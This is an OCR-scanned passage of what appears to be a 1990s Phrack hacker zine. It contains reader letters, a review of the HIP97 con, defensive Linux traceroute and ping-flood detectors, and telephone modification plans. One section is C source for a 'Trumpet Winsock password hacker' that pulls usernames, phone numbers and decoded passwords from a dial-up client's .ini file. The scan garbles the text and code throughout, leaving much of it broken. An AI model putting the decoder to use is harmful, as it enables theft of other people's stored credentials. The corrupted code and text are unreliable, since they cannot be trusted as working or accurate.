integer-based calculations, not floating point operations. ] 


one of these "instructions" can operate on, let’s say something around a 
28th power float variable, then disregarding read/write operations, the 
system can search at 1.06 trillion keys/sec. This yields a total search 
time (before a successful "hit") of 

170,141,183, 460, 469,231, 731, 687, 303715, 884,105,728 / 1.06 trillion = 
160,510,550, 434,000,000,000,000,000 seconds = 5,089,756,165,470,000, 000 
years or 5.089 quintillion years... still a rediculous amount of time 
even on the fastest publicised system in existence. Now, this system, 
the Intel/Sandia Teraflops Supercomputer is made up of 9,200 200 MHz 
Pentium Pro processors. Being that they didn’t have to buy them at 
markup/retail and they manufacture them from scratch for their own 
purposes, let’s say it cost $500 per chip plus some negligible ram and 
labor costs (how much ram do you need when you have a gigt worth of 
onboard cache, etc.). With 9,200 chips, the system would take about 
$4,600,000 to build. A practical question: if federal taxation is %28 on 
an annual income of $80,000, where does all the money go? Well, let’s 
say a Billion dollars per decade goes to the NSA to build whatever they 
want. If the 9,200 chip system cost $4,600,000 then a little algebra 
reveals that with one billion dollars, the NSA could purchase 
approximately 2 million 200 MHz pentium pros. If the 9200 chip system 
did 1.06 trillion keys/sec, thus the 2 million chip system would be 
capable of approximately 230,434,782,609,000 keys/sec or app. 230 
trllion keys/sec. Now, say the NSA is smart enough not to buy crappy x86 
chips and instead get 500 MHz DEC Alpha RISC chips. This is 300 Mhz or 3 
fifths faster than a 200 MHz pentium pro approximately. so 230 trillion 
+ (230 trillion * 3/5) = 368,695,652,174,000 or 368 trillion keys/sec. 
The original calculation yields that the successful search time would be 
170,141,183, 460, 469,231, 731, 687, 303715, 884,105,728 / 368,695,652,174,000 
= 461,467, 832,499,000,000,000,000 seconds = 14, 633,048,975, 700,000. Ok, 
great... so now we’re down to 14.6 quadrillion years of search time, 
which means that at least now we may get REALLY lucky and hit the right 
key within a certain degree of insanity. But, this was only a billion 
dollars we gave the NSA in a decade. If we’re especially paranoid, let’s 
say the government was so concerned over nuclear terrorists sending 
encrypted messages, that the NSA got a TRILLION dollars to build a 
system. That divides the whol quation by a thousand making the search 
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time 14, 633,048,975,700 years or 14.6 trillion years... STILL 
rediculous. Ok, so let’s say that now we’re giving the NSA a HUNDRED 
TRILLION DOLLARS thus dividing the search time by 100 yielding 
146,330,489,757 years which is about ten times longer than the existence 
of the universe. But now, if we had 1,000,000,000 of *these* machines 
working concurrently the search time would wind up being 146.330489757 
years. But, if each RISC processor were replaced with a small piece of 
nanotechnology, each piece of this nanotech being 100 times faster than 
the alpha chips, you get 1.46330489757 year. There ya have it... some 
classified nanotechnology, 100 trillion dollars, and a DAMN lot of 
landmass all multiplied by 1,000,000,000 and you’ve brute forced IDEA in 
a year and a half. I won’t go into the tedious calculations, but an 
object with the surface area of two of our moons would approximately be 
able to house this complex. Now, as I know you’re asking about where to 
store all the keys... and the fact that this drive would be bigger than 
a solar system and so on, just have the keys generated using the same 
PRNG in the brute force attack... you’1l just have thr times th 
instructions (write for the generation, read to get it, write to compare 
it) so multiply the search time by three. The technology is possible... 
it’s economics and territory that doesn’t work. 


[ Theorectially shure. But you have sorta just proved the point that 
it is not feasible. ] 


—~-gKHAN 


Ox2b> 


The snippit in P50 in section 02 of the zine by Xarthon entitled 


> Yet another Lin(s)ux bug! "IP_MASQ fails to check to make sure that a 
> packet is in the non routable range." "So in conclusion, you are able to 
> spoof as if you are on the inside network, from the outside. " 


Is so incomplete I would almost call it a lie. The only way that Linux 
would do this is if the person setting up the IP-Masq system issued the 
command "ipfwadm -F -p masquerade" which if you read the IP-Masq HOWTO it 
tells you explicity NOT to do for this very reason. My retort for Xarthon 
and all others who do stupid ass things like leave port 19 open and such; 
is that Linux only sux if you do. To wit, don’t be a moron, and you won’t 
have to complain that it sucks. 


Swift Griggs | UNIX Systems Admin 


Ox2c> 


Hi there, 


I have a question regarding a certain piece of hardware that has come 
into my possession. Since this little piece of equipment contains no 
indications of its intended use i have no idea what this thing could do. 
So here’s a descrition of the little box; i hope you might be able to 
provide me with more information on what this device is supposed to do. 


Description: 

-lightgrey rectangular casing (13CMx9CMx3CM) 

-frontpanel has one green LED, a connector labeled "SCANNER", and a 
little door which reveals two sets of dipswitches (2 sets of 8, labeled 
"DIPSW1" and "DIPSW2") 
-backpanel has three connectors, a RJ4-like connector (only it has 6 
lines instead of 4; it looks like a connector for a Memorex Terminal) 
labeled "A", a standard IBM-PC keyboard connector labeled "B", anda 
small (9-pin) serial interface-connector labeled "C". 

-there is a sticker with a serial number, a barcode, and "Made in 
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Taiwan" on the bottom 

-the circuit-board contains IC’s of Sony, Philips, and TExas Instruments 
-there is also one removable EPROM, made by AMD; it has a label on it 
which reads "V2.61 CS:EF88" 


I have found that a normal keyboard plugged into connector B, while a 
KBD-to-RJ-jack cord is plugged into connector A will allow the box to be 
placed between the keyboard and the kbd-port; so my first guess would be 
that this is some kind of filtering device. But that doesn’t explain why 
there is a serial-connector and this "SCANNER" connector present. 


So, do you know what this thing is ? 
—lucipher. 


[ Readers? ] 


Ox2d> 


hi, my friends.i am a newbie come from China,i had read some Phrack magazine. 


but to me surprise,i had not success compile a program still now.i send e-mail 
to the author,but server tell me there is no this user. 

for example, phrack-49-15 describle tcp port scan,but i can not find 
ip_tcp.h, other paper tell me a way to guess password,and said the program onl 
need Ansi complier,but i can not success too. oh.my god. 

1 use sun os ,gcc, i need your help, thanks. 

yours 
keven zhong 


[ Here at Phrack, we use TheDraw for ANSI compilers. I hope that 
answers your question. ] 


Ox2e> 


I’m just writing this to say thanks to all the hackers that represent Phrack 
and work hard to keep it going, you guys are truly keeping the new generation 
alive.If it weren’t for Phrack i’d probably never have wanted to waste my time 
with computer’s,the technical info is first class and a lot better than most 
of the crap out there.I would suggest that maybe once in a while u guys could 
write some more stuff geared towards the newbies,it really is important 
because most people who aren’t familiar with the terms get completely 
lost.Down here in Montreal(514),most people think hacking is spreading virri 
or u/l shitty trojans,there’s no talk about unix or networks.We really need 
some help down here,the scene is practically dead and most newbies don’t have 
any support to help them get started.Anywyas i just want to say keep up the 
good work,and it’s really appreciated. 


| Return Address: Dave.Conway@claw.mn.pubnix.net 
| Standard disclaimer: The views of this user are strictly his/her own. 


[ Thanks, if anyone cool is in Montreal, e-mail this guy and revive 
your scene. ] 


y 
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A Review of H.I.P. 


<torquie@landslide.openix.com> 


Out of all of the cons I’ve been to (and I’ve been to loads), Hacking In 
Progress was definitely the coolest and the most surreal hacker con ever. 

This was definitely a European event though there were a few arrivals from the 
US. The atmosphere was carnival. It was like an old style con where you got 
together to meet up with people face to face, exchange ideas and basically 
have loads of fun. 


Around 2500 people attended: hackers, artists, media, police... a total mish - 
mash of cultures and ideas. 


HIP was a total geek-fest. Computer networks were spread across the campsite. 
In the mornings (when I actually slept) I awoke to the chirping of birds and 
the booting up of windows95. In the evenings I sat around the campfire 
chatting to mates while the hardcore’s played DOOM and exchanged warez. 


During the day there were various activities. One tent held lock-picking 
classes. In another a group of astronomers had set up telescopes linked to 
computerized data-tracking equipment that you could print out. The 
cypherpunks had their own tent set up and I snuck in occasionally for a chat 
and a cold drink. 


= 


There was a videoconference link connected to HOPE but it crashed and was 
abandoned. In the main marquee, there were lectures on the usual faire of 
hacker interests: computer security, the legalities of hacking, anonymous 
re-mailing, cryptography, etc. The weather was boiling and my melted brain 
found it exceedingly difficult to concentrate. Most of my time I spent 
outside in the shade or the tent housing the bar, talking to people 
individually or in small groups. 


The public telephones mysteriously malfunctioned on Sunday and could only be 


used to dial th mergency services. However if you dialed the Dutch 
equivalent to 911 you got a dial tone, so you could dial anywhere in the world 
for free. Supposedly this was a /programming error’ on the part of the Dutch 


Telephone Company. 


Smaller more interactive workshops were also held. Though the technical 
lectures were really interesting, my favourite event was Padeluun’s yo-yo 
workshop. Besides the fact that I got to keep the yo-yo, the workshop itself 
was farcical performance art. If you know the background you will understand 
what I mean, if not... Padeluun is a member of the FOEBUD group from Germany. 
These people do some really brilliant projects and are very politically 
motivated. One of their projects was to put up networks during the war in 
the former Yugoslavia. They also work to distribute PGP to groups in 
countries with oppressive governments. It is not just anyone who could pull 
off a workshop like this. This was high irony. When I walked up the workshop 
had already started and I came in on the line ’yo-yoing is good for social 
engineering, no one finds you a threat when you yo-yo’. As the head of the 
Dutch Computer Crimes division was in attendance I thought this rather 
hilarious. 


The attitude at HIP was really positive. The European definition of hacking 
has always been broader than the American definition. Europeans accept the 
idea of ’social hacking’. Not hacking in the Unix sense but in the sense of 
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subverting technology, whether it be by pirate radio, hacking smartcards, 
social engineering the feds... or whatever. Unlike some cons I’ve been to in 
the past couple of years, the atmosphere of HIP was really mature. There 
weren’t any young kids trashing anything, there weren’t any stairwells to 
flood, no one set off any fire alarms or randomly destroyed anything through 
boredom, and generally the people who attended had a lot of respect for the 
event and the organisers. Which means that no one I saw acted like a total 
wanker and no one is going to run the event out of town. 


On a personal note it was brilliant meeting people there and hearing of some of 
the most recent projects people had on the go. Since the last time this event 
was held (HEU, ’Hacking at the End of the Universe’ held at the same spot in 
1993), the hacker scene has changed. 


One difference that struck me straight away was the fact that there were just 
as many females as males. And these women weren’t girlfriends or hacker ho’s 
but women that are getting to grips with the technology and using it for 
various projects. 


Felipe Rodrigez who started Hack-tic along with Rop Gonggrip back in the early 
days of Holland’s hacking scene, has always been active on the political front 
"For us, things have changed. They used to call us criminals and think of us 
as terrorists. Now we advise the Ministry of Justice. We’re the only ones 
who know the technology here." 


Rodrigez also believes that hacking is still a very useful tool in countries 
like Peru or Serbia where the state is unfair and citizens need to "defend 
themselves." This view has made him unpopular with the secret services who 
consider the former Hack-tic more dangerous now that they have power in the 
business community in Holland. 


Though things may have changed since the early days of hacking, the European 
scene seems to have become something more grown up. "The hacker scene is now 
pockets of culture. There’s alternative media, the old hacker culture, the 
Unix hackers, irc, even astronomers who are into their own computer culture. 
It’s now for all of the people, which is why we call it Hacking in Progress, 
we have progressed" 


As a summation, HIP was fantastic. It was brilliant to see most of the people 
I have known in the European scene in one place and to meet some new peopl 

who I will definitely keep in touch with the coming years. I’m really looking 
forward to the next one! If you want photos and other articles check out the 
HIP site at www.hip97.nl. 


Ox2> 


To: All it may concern 


It has come to my attention, that people are forgetting what 
hacking is. I’m not speaking about the freedom of information, or the 
pursuit of learning.. I’m talking about the fact that it is illegal and 
against the law.. I hear left and right.. " So and So has been busted.. 
lets protest... lLet’s get the Hacker Defense Fund(TM) to help us! " 


Hey time to wake up.. YOU ARE A CRIMINAL IF YOU ARE COMPROMISING THE SECURITY 
OF SITES/PHONE SYSTEMS/ETC.. 


Not a rant, just a note that it’s time to face up to your responsibilities.. 


— Someone 


Ox3> 


/* 
TRUMPET WINSOCK PASSWORD HACKER by DOCTOR JEEP 11/96 
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erode@avana.bbs.comune.roma.it 
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written for Turbo C 2.0 (C) (old but cheap :) ) 


The author doesn’t take any responsabilities for any proper/improper use of 
this program. 


2) 


<++> winsock_passwd_hack.c 
#include <stdio.h> 
unsigned char 
spazio[21]={88,75,55,47,114, 66,87, 92, 35, 68, 69, 87,101, 38,122,123,45,117,74,78}; 
unsigned char name[34], fono[33], passc[33],riga[33],passd[23]; 


unsigned char user[11]="Susername=", tele[9]="Snumber=", 
pass[11]="Spassword="; 
FILE *f1l; 


int 2 ;:V,-C; ke 


decodi (int ver) { 
int ds:,b; 
if (ver==20) 1s=10; 
if (ver==21) ls=11; 
b=strlen(passc) ; 
for (i=ls;i<b;itt) { 


v = passc[il; 

v =v + 32 - spazio[i-ls]; 

if (v < 32) v=v+t+ 96; 

if (i-10<21) passd[i-ls] = v; 


} 


scrivi(int n, int st, unsigned char str[], char messaggi[]) 
{ 
c=strilen(str); 
printf ("%Ss",msq) ; 
for (k=n;k<c-st;k++) { 
printf ("Sc",str[k]); 


} 
printf ("\n"); 


} 


main (argc,argv) 
int argc; 
char *argv[]; 
{ 
printf ("\n\nTrumpet Password Hacker by Doctor Jeep 96 NO (C)\n\n"); 
if(argce!=2) { 
printf ("Specify the trumpet .ini file with his path \n"); 
exit (1); 


} 


fl=fopen(argv[1],"r"); 

if (f1==NULL) { 
printf("\nUnable to open configuration file"); 
exit (1); 


} 


printf ("\n"); 
while(!feof(f1)) 
{ 

fgets (riga,32,f1); 


if (strspn(riga,pass)==10) strcpy(passc,riga); 
if (strspn(riga,user)==10) strcpy (name, riga) ; 
if (strspn(riga,tele)==8) strcpy(fono,riga) ; 


} 
fclose(fl); 
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scrivi (8,1,fono,"Server’s Tel. #: "); 
scrivi (10,1,name,"Username: ") 
decodi (20); 
scrivi (0,1,passd,"Trumpet 2.0 password: "); 
decodi (21); 
scrivi(0,3,passd,"Trumpet 2.1F password: "); 
} 
<--> 


/* END OF FILE by Doctor Jeep */ 
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Ox4> 


Tools for (paranoid ?) linux users 
by whynot AKA baldor 


-> you need basic TCP/IP knowledge to understand this article <- 


Recently not only then number of attacks on big / commercial servers and 
machines with fast connections has increased, but even users with dial-in 
computers have been attacked or spied on. A good example is the winnuke.c 
program that has been released on BugTraq and has been used excessively. 
Although these attacks are not as "threatening" as the attacks that are 
launched against big servers it can get really annoying if some idiot 
frequently tries to hack you / takes your machine down / delays you. 


Most Linux distributions have reacted to this development and made their 
telnet/ftp/whatever servers log every access. In this way you can easily put 
annoying hosts into /etc/hosts.deny. But in my opinion there are (at least) 
two things missing which I want to discuss in detail... 


1. Detecting traceroutes 


Traceroute is a really powerful command, which is often used to detect where 
the computer that is being tracerouted is located and to which network it is 
connected. Because of some simple reasons you can *not* simply make it 
impossible for people to traceroute you, so the best you can do is detect *if* 
someone traceroutes you, find out *who* tracerouted you and confuse him a bit. 


1.1 How does traceroute work ? 


Basically traceroute just sends out IP/UDP probe-packets to the specified host. 
To find out how the packet is routed (through which hosts it is going) 
traceroute uses the TTL (time to live) field of the IP header. This TTL field 
specifies an upper limit of how many routers this packet can pass through 
before it gets dropped. Every router decreases the value of the field when 
the packet in question arrives, until it becomes 0. If this happens the 
router sends back an ICMP TIME_EXCEED to the sender of this packet (which is 
the host that is tracerouting). 


So the strategy traceroute uses to trace the path of a packet is to send 

out packets to the target host putting an increasing value (starting with 1) 
into the TTL field. If a host reports ICMP TIME_EXCEED traceroute prints out 
its address and the time that passed from the sending of the IP/UDP probe 
packet until the receiving of the ICMP TIME_EXCEED. After that it will 


prepare a new probe packet with an IP TTL one greater then the previous packet. 


[7] 


Traceroute will continue doing this until it receives an ICMP PORT_UNREACHABLE 
packet from the target address, or the max hop count has been reached (defaults 
£6: 3:0: 


To understand this we should take a look at the UDP part of the packet we 
talked about above. To detect somehow that it finally reached the target host 
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and should not try to go any further traceroute uses the connectionless UDP 
protocol. The UDP part of the probe-packet is addressed to a port which is 
barley/never used (in nearly all Unix implementations 33434+ the TTL included 
in the IP-Packet). Since (normally) nothing is listening on port 33434 (and 
above) the target host sends back an ICMP PORT_UNREACHABLE signal that tells 
traceroute that it reached the target host and can stop sending any more 
packets. 


Since the strategy of traceroute is a bit complex here is an (a bit simplified) 
example. Let’s say that you are host "source" and tracerouting your way to 
host "target". 


source:/root # traceroute target 
traceroute to target (134.2.110.94), 30 hops max, 40 byte packets 


Now source sends out a probe packet to target (port 33434) with a TTL of 
1. The packet is passing "some_host" and the router decreases the TTL of 
the packet. It recognizes that the packet has "expired" (TTL=0) and sends 
back an ICMP TIME EXCEED to source. Now traceroute uses the information 
included in this packet to print out data about the first host the packets 
to target are passing: 


1 some_host (142.45.23.1) 2.456 ms 


Another probe packet is sent out by source, this time the TTL is 2 and the 
port is 33434+1 = 33435. It gets back another ICMP TIME_EXCEED packet 
this time from another_host: 


x 


2 another_host (142.45.10.1) 3.983 ms 


The third Probe has the TTL set to 3 and is addressed to port 33436. 
Traceroute now gets back an ICMP PORT_UNREACHABLE from "target": 


3 target (142.45.10.13) 4.032 ms 
That’s it ! Traceroute now finished its job and quits. 

source:/root # 
Please note that traceroute by default sends out three packets containing 
the same TTL (each packet to an increasing port number) to determine the 


answering time of a host more accurately. In reality, a traceroute output 
therefore looks like this: 


traceroute to localhost (127.0.0.1), 30 hops max, 40 byte packets 
1 localhost (127.0.0.1) 1.983 ms 1.304 ms 0.934 ms 


1.2 The strategy behind the traceroute-detector 


Knowing how traceroute works it is very easy to detect. Simply set up 
sockets listen()ing to the ports 33434 and above and react if they receive 
any packets. You can even try to guess how many hops the host that is 
tracerouting you is away by subtracting 33434 from the port-number you 
received the packet on and dividing the result by three. 


Listening to the port traceroute sends the probe-packet to also produces a 
funny effect: traceroute will neither get back an ICMP TIME_EXCEED nor 

an ICMP PORT_UNREACHABLE signal. Therefore it will timeout waiting for the 
reply and put a * into your hosts entry. Because of the timeout 

traceroute will *not* recognize that it already reached its target and 
continue sending probe-packets until the maximum number of hops is 

reached. 


With the little program detecttr running (and listening to ports 33434 - 
33434*30*3) a traceroute localhost looks like this: 


schnecke:/root # traceroute localhost 
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traceroute to localhost (127.0.0.1), 30 hops max, 40 byte packets 


1 *« * * 
D2 * * * 


a0) eS 


1.3 Problems detecting traceroutes 


The only problem with detecting traceroutes is that one might select 
another base-port number than the default or use another technique. 

I have never seen any people doing this though. So if just an average 
idiot (or wannabe "hAx0r") is tracerouting you chances are really high 
that you detect it. 


If you are *really* paranoid about traceroutes you should not use the 
ports to detect a trace but edit the file that deals with UDP packets. 
This /usr/src/linux/net/ipv4/udp.c 
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(NOTE: this file is a part of the kernel. Recompile your kernel to make 
changes take effect) 


Insert the line: 


printk(KERN_INFO "UDP: packet sent to unreachable port by %s !\n", 
in_ntoa(daddr) ); 


before line 833: 


ICMP_send(ski, ICMP_BEST_UNTEACH, ICMP_PORT_UNTEACH, 0, de); 


This will make the system log *all* requests to unreachable ports that are 
delivered through the UDP protocol. Please note that the funny effect 
described in 1.2 will not occur (which can also be an advantage). 


BTW: Please be careful while editing the kernel - you need it :) 


1.4 Sample Implementation 


detecttr.c -> see the end of this file 


2. Detecting pings 


There has been a lot of discussion about ping in the last few months 
because it was often used to transmit oversized packets to other hosts 
resulting in crashes. Although this bug has been fixed on most hosts 
already ping still is very popular to slow down people who are connected 
to the net through modem lines until they drop carrier themselves becaus 
of the BIG lag. 


You can *not* prevent people from pinging you (without having your ISP 
blocking all ICMP_ECHO requests to your host) and therefore causing 
traffic on your modem line. But you can actually detect *who* pinged you, 
determine the ping-packet size and decide not to reply (this *may* reduce 
the data over your modem line up to factor 2). 


2.1 How does ping work and how do people slow down others by using ping ? 


Simplified ping sends a packet containing an ICMP_ECHO and some data to the 
target which will reply with an ICMP_ECHOREPLY packet that contains the data 
sent to it (only some fields are modified). 


Normally ping will wait about 1 sec before it sends the next ICMP_ECHO. On 
many implementations of ping you can bypass this and do a "floodping" which 
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will *not* wait but just send the packets as fast as possible. If you choose 
a big packet size for the ping packet and you are pinging your victim from a 
host with a fast connection (Tl or Ethernet) this will cause a lot of traffic 
on your victims modem line and therefore slow him down to a halt. 


2.2 How can I detect a ping and how do I prevent being flooded ? 


Since a ping is nothing more than a ICMP_ECHO with some data appended to it 
you can simply intercept it, extract the senders address and the packet siz 
from it and decide whether you want to reply or not. For non-floodpings you 
can reduce the amount of data transferred over your modem line simply by 
choosing not to reply. But if someone is floodpinging you it does not help 
much to not reply to the ping packets --> the incoming ping packets will 
probably cause enough traffic to slow you down (unless the host where 
floodpings come from is has a slow connection). At least you can give it a 
try anyway... 


2.3 Sample implementation 


The handling of the ICMP_ECHO is done in the kernel. Edit your 
/usr/src/linux/net/ipv4/icmp.c file and search for the section "Handle 
ICMP_ECHO". These 16 lines of code are all you need to modify to defend 
yourself against / detect ping-floods. 


If you know a little C you can easily see that there exists a define 
"CONFIG_IP_IGNORE_ECHO_REQUESTS" which you can set to have the kernel just 
ignore all incoming ICMP ECHO_REQUESTs. But we want to be more selective. W 
want to log all pings that are sent to our machine. We do this by inserting 
the line 


printk(KERN_INFO "ICMP: pinged by %s, packetsize = %d \n",in_ntoa(saddr), 
icmp_param.data_len); 


before the #endif. 


You can easily change the "Handle ICMP_ECHO" section so that your machine 
only replies to ICMP ECHO_REQUESTs that do not carry too much data and 
ignore the pings with big packet sizes: 


<++> DTR/icmp.patch 

static void icmp_echo(struct icmphdr *icmph, struct sk_buff *skb, struct device *dev, __u32 

saddr, __u32 daddr, int len) 

{ 

#ifndef CONFIG_IP_IGNORE_ECHO_REQUESTS 
struct icmp_bxm icmp_param; 
if (len <= 1000) { /* we only reply to pings that do carry less than 1k data */ 

icmp_param.icmph=*icmph; 

icmp_param.icmph.type=ICMP_ECHOREPLY; 

icmp_param.data_ptr=(icmph+l); 

icmp_param.data_len=len; 

if (ip_options_echo(&icmp_param.replyopts, NULL, daddr, saddr, skb)==0) 
icmp_build_xmit (&icmp_param, daddr, saddr, skb->ip_hdr->tos); 

printk(KERN_INFO "ICMP: pinged by %s, packetsize = %d \n", in_ntoa(saddr) 

,icmp_param.data_len); 

} 


else 


printk (KERN_INFO "ICMP: possible FLOOD DETECTED by %s, packetsize = %d \n", 
in_ntoa(saddr),len ); 
#endif 


kfree_skb(skb, FREE_READ) ; 


} 


<=> 


<++> DTIR/detecttr.c 

/* 

* detecttr.c —- by whynot AKA baldor (whynot@cyberjunkie.com) 
* created: 08.05.97 
* last modified: 11.07.97 
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* Platforms: Linux, FreeBSD should work with other POSIX-systems too. 


Compile: 
just the usual "gcc -o detecttr detecttr.c" for GNU C and 
"cc -o detecttr detecttr.c" for other compilers... 


Usage: 

Just run this program at the startup of your machine - it will stay in 
the background until someone traceroutes you. It only uses a *tiny* bit 
of your memory and nearly 0% CPU :) 


+ + + + + FF FF F F F FX 


nclude <stdio.h> 
nclude <stdlib.h> 
nclude <errno.h> 
nclude <string.h> 
nclude <sys/types.h> 
nclude <netinet/in.h> 
nclude <sys/socket.h> 
nclude <sys/wait.h> 
nclude <sys/time.h> 
nclude <sys/signal.h> 
nclude <sys/syslog.h> /* simply comment this out if you don’t have syslog.h */ 
nclude <netdb.h> 


ee a ee ee 


define MAXBUFLEN 200 
define MYPORT 33435 
define NUMPORTS 30*3 


int sockfd[NUMPORTS]; 


void shutitdown () 


{ 


int w; 
char buf[50]; 
for (w=0; w<NUMPORTS; wtt) 
close (sockfd); 
sprintf (buf, "DetectTraceroute terminated\n") ; 
syslog(LOG_NOTICE , buf); 


exit (0); 
} 


char *getname (struct in_addr addr) 
{ 
struct hostent *h; 
int w; 
char foo[4]; /* the 4 numbers as ASCII-Values per char */ 
int tmpint[4]; /* used to convert from a string to 4 numbers */ 
char tmpbuf [20]; 


sprintf (tmpbuf, "Ss", inet_ntoa(addr) ); 


if ( sscanf(tmpbuf,"%d.$d.%d.%d", &tmpint[0], &tmpint[1], &tmpint[2], &tmpint[3]) 


printf ("Error while detecting hostname !\n"); 
exit(1); 
} 


for (w=0; w<4; wtt+) foo[w]=tmpint[w]; 


if ( (h=gethostbyaddr(foo, 4, AF_INET)) == NULL) { 
herror ("gethostbyaddr") ; 
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exit (1); 


} 


return h->h_name; 


} 


main(int argc, char *argv[]) 
{ 
int hops; 
struct sockaddr_in my_addr; 
struct sockaddr_in remote_addr; 
int addr_len, numbytes; 
char buf [MAXBUFLEN]; 
int w; 
fd_set readfds; 


if( fork() !=0 ) return(0); /* we don’t want to use that annonying & */ 


signal (SIGHUP, SIG_IGN); /* ignore SIGHUP */ 


signal (SIGTERM, shutitdown); /* clean shutdown */ 


for (w=0; w<NUMPORTS; wtt) { 


if ( (sockfd[w] = socket( AF_INET, SOCK_DGRAM, 0)) == -1) { 
perror ("socket"); 
exit(1); 


} 

my_addr.sin_family = AF_INET; 
my_addr.sin_port htons (MYPORT+w) ; 
my_addr.sin_addr.s_addr = htonl(INADDR_ANY) ; 


bzero(& (my_addr.sin_zero), 8); 


if ( bind (sockfd[w], (struct sockaddr *)&my_addr, sizeof (struct sockaddr) 


perror ("bind"); 
exit(1); 


FD_ZERO (&readfds) ; 
for (w=0; w<NUMPORTS; wtt) 
FD_SET(sockfd[w], &readfds) ; 


sprintf (buf, "DetectTraceroute successfully started\n"); 
syslog(LOG_NOTICE , buf); 


while(1l) { 
select (sockfd[NUMPORTS-1]+l, &readfds, NULL, NULL, NULL); 


for (w=0; w < NUMPORTS; wtt) { 
if (FD_ISSET(sockfd[w], &readfds) ) 
hops = w; 


} 


addr_len = sizeof(struct sockaddr); 


if ((numbytes=recvfrom(sockfd[hops], buf, MAXBUFLEN, 0, (struct sockaddr *) 
&remote_addr, &addr_len)) == -1) { 
perror("recvfrom") ; 
exit(1); 
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/* we use buf for misc stuff O:-) */ 
sprintf (buf,"TRACEROUTE from IP %s. Hostname: %Ss HOPS: %d", inet_ntoa(rem 
ote_addr.sin_addr), getname(remote_addr.sin_addr), hops / 3 +1); 
syslog(LOG_NOTICE , buf); 
FD_ZERO (&readfds) ; 
for (w=0; w<NUMPORTS; wtt) 
FD_SET(sockfd[w], &readfds) ; 


<--> 
O0x5> 
Wills pal lt ATER Say Ss Esra rncr epcc ae ay Me ge uy meebo Qn cee Ar ] 
| | [Ill ll {£ The Street Phreak’s Phone Mods vol. 1 ] 
| PITTI Tttt Jex {612} ] 
Po Tilt? Tl dt <jex@teenworld.poboxes.com> ] 
| | | | TtLIltt ] 
[intr0O 
97.07.01 


This project is a result of a need to have a more versatile phone for at 
home and in the field. Many "phone modification" files have been floating 
around the scene for quite some tim some are incomplete, inaccurate, or 
would be better taken advantage of if they were all integrated. This project 
should be a good starting point for making your phone elite. 


The following modifications are divided into two primary parts: The first 
being made to your phone directly, and the second being as a separate 
component. 


[part 1: m0d me] 


Teq 

2 1/8" mono jack (or stereo with tips tied) 274-274 2/S1.89 Ul, U2 

2 SPDT slide switch 275-409 2/$1.19 SW1, SW3 
1 100k single turn pot 271-092 $1.29 R2 

1 Mini red LED 276-026 2/S0.99 D1 

1 Hallmark Digital Greeting Card (optional) (Hallmark) 1/$8-10 ICl 

1 6v power source (optional) 

1 SPST normally closed momentary (optional) 275-1548 4/$2.89 SWw2 

1 10k (optional) 271-1335 5/$0.49 R1 


Since I’m cool, I’1ll give you a rough walk-through on the construction along 
with the schematic. The phone modifications were kept to a minimum, since you 
most likely want the majority of your cute toys in the modular component. I 
would like to make these devices modular as well at some point in the future 
—- if anybody would like to beat me to it, by all means. 


—-[ring switch] 


Desolder wire off one pad of the piezo element (ringer) 
Connect desoldered *pad* to right pole of SPDT 
Connect desoldered *wire* to center pole of SPD! 
Connect LED to left pole of SPDT 

Connect other side of LED to the pad of piezo element with the origional 
wire 


OB WN EF 


(Note: You should now be able to select between an audible ring and the 
flashing light. If the LED does not light but the ringer works, switch 
the wires going to the LED as the anode/cathode are not in the right 
positions.) 


5 
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--[in jack] 


Desolder wire (-v, probably black) off one pad of the microphone 


6. 

7. Connect desoldered *wire* to center pole of SPDT 

8. Connect recently desoldered *pad* to right pole of SPDT 
9%, 

1 

1 


Connect tip (or base) of Ul to left pole of SPDT 
0. Connect base (or tip) of Ul to the center pole of R2 
1. Connect side pole of R2 to the pad of the mic with the original wire 


(Note: You should now have the ability to switch between the audio jack and 
the mic. This is necessary as the audio jack always drowns-out the mic, 
even when it is doing something such as playing "UN-noise" while a tape 
rewinds. This also serves as a mute switch.) 


-—-[out jack] 
12. Connect U2 in parallel with the speaker. 


(Note: Out jack.) 


—-[optional digital recorder] 


13. Desolder mic from Hallmark card (IC1), it will not be used 
14. Connect desoldered mic wires to the base and tip of U2 in parallel 


(isolated) 
Desolder speaker from IC1l, it will not be used 
Desolder one speaker wire, it will not be used 


Connect the other speaker wire to Rl 

Connect other side of R1 to the mic pad that has the original (vt) wire 
and R2 connect to it 

19. Desolder "play switch" paying attention to how it is connected, it sucks 
20. Connect SW2 in it’s place 

21. Connect v- (black wire) of 6v power source to SW2 

22. Connect vt+ to ICl 


orn nuw 


(Note: You should now be able to record from the mic and jack, and be able to 
play it back into the phone.) 


[part 2: cOnstructiOn Of pOw-paq] 


Teq: 

8 DPDT slide switch 275-403 2/$1.39 SW1, SW2, 
SW3, SW6, 
SwW7, SW8, 
Sw9, SW12 

2 SPST slide switch 275-401 2/S1.19 SW4, SW10 

2 DPST slide switch (substitute with 2 DPDT) 275-403 2/$1.39 SW5, SW11 

2 Dual polarity LED (phreakz discretion- 2 LED1, LED3 


LEDS in parallel, ora 
2 pin Dual LED package) 
6 6P4C Modular Jack (try DigikKey, www.digikey.com) 


Parasitic Tap Detectors: 


2 15v Zener Diode 276-564 2/$0.99 D2, D4 
2 Mini Red LED 276-026 2/$0.99 LED2, LED4 
2 Bridge Rectifier 276-116l1a 1/S0.99 Dl, D3 


(Note: I substituted the 1N914/4148 Silicon Diode for the Zener and it seems to 
work fine, 276-1122, 10/$1.19) 
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As you may of noticed, the Parasitic Tap Detectors are taken straight from 
the article Tap Alert in 2600 vol 13 iss 1, credit is given to No Comment and 
Crash Test Idiot. 


Now, what all this is. You have two primary inputs, and one master input in 
case you have a single connector with two lines on it. There are two 
"outputs", whose function is up to you (these are optional). Now you are left 
with one master output, whose function should be obvious. 


SW1l & SW7 change between the "outer" and "inner" wires, in other words 
Red/Green vs. Black/Yellow. SW2 & SW8 reverse polarity of the line (one is 
optional). SW3 & SW9 serve as polarity detectors, lighting one color for a 
certain polarity and another color for the other polarity (one is optional). 
SW4 & SW10 make use of the tap detectors. Most of the time you will not be 
using the tap detectors as they can have problems with the other devices on the 
line, experiment. SW5 & SW1l are primary line power switches, make the line go 
off or on. SW6 & SW12 are hold switches for each line, when they are both "off 
hold" you may conference the two lines. 


The polarity changers are a must —- often times store-bought telephone cables 
reverse voltage, and even your wall jack might have non-uniform polarities. To 
use both lines at once, the polarity for each line must be the same, this can 
be achieved by throwing just one switch if they are reversed (it’s an either/or 
state). 


If you find any errors or corrections you would like to make, or you just 
need a shoulder to cry on, my email is listed above. Any upd8s can be found at 
http://www.geocities.com/SiliconValley/Heights/1334, thanks for playing. 


[schematix] 


